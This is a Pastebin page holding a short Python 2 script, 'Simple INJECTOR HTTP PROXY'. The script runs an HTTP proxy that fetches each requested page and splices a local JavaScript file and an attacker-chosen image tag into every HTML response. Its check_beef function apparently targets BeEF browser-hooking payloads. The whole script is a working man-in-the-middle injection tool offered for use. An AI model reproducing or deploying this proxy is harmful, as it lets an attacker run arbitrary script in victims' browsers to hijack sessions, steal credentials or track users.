Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # coding: utf-8
- TEST_JS_FILE = 'test.js'
- import socket
- try:
- from http_parser.parser import HttpParser
- except ImportError:
- from http_parser.pyparser import HttpParser
- from requests import get
- from HTMLParser import HTMLParser
- from bs4 import BeautifulSoup, Tag
- from sys import argv
- from optparse import OptionParser
- banner = '''
- ___ _____ _____ _____ ___ _ _
- |_ |_ _| __ \ / ___|/ _ \| | | |
- | | | | | | \/ \ `--./ /_\ \ | | |
- | | | | | | __ `--. \ _ | |/\| |
- /\__/ /_| |_| |_\ \ /\__/ / | | \ /\ /
- \____/ \___/ \____/ \____/\_| |_/\/ \/
- Simple INJECTOR HTTP PROXY
- '''
- def check_beef (r):
- return "text/html" in r.headers ['content-type']
- def check_args ():
- if not len (argv) >= 3:
- print 'Usage: %s <host> <port> [--js-script=script.js] [--image=http://example.com/image.png]' % argv [0]
- exit (1)
- def init_optparse ():
- opt = OptionParser ('Usage: %s <host> <port> [--js-script=script.js] [--image=image.png]' % argv [0])
- opt.add_option ("--js-script", dest="js", help="js script for injection (local file)")
- opt.add_option ("--image", dest="img", help="image for injection (url)")
- (opt, args) = opt.parse_args ()
- return opt
- def main ():
- print banner
- check_args ()
- opt = init_optparse ()
- http = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
- http.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- http.bind ((argv [1], int(argv[2])))
- http.listen (1)
- print "[*] Waiting for requests ..."
- while True:
- try:
- connection, addr = http.accept ()
- parser = HttpParser ()
- data = connection.recv (1000000000)
- if data:
- parser.execute (data, len (data))
- HOST = parser.get_headers().items () [0][1]
- print '[' + addr [0] + ']: ' + HOST + parser.get_path ()
- data_ans_ = get ('http://' + HOST + parser.get_path ())
- data_ans = data_ans_.text
- bs = BeautifulSoup (data_ans, 'html.parser')
- print check_beef (data_ans_)
- try:
- if check_beef (data_ans_):
- if opt.js:
- script = bs.new_tag ('script')
- script.string = open (opt.js).read ()
- bs.find ('body').append (script)
- if opt.img:
- img = bs.new_tag ('img', src=opt.img)
- bs.find ('body').append (img)
- connection.send (bs.prettify ().encode ('utf-8') if check_beef(data_ans_) else data_ans)
- connection.close ()
- except Exception as t:
- print 'FUCK', t
- print HOST
- except Exception as e:
- print e
- except KeyboardInterrupt:
- exit (0)
- if __name__ == '__main__':
- main ()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement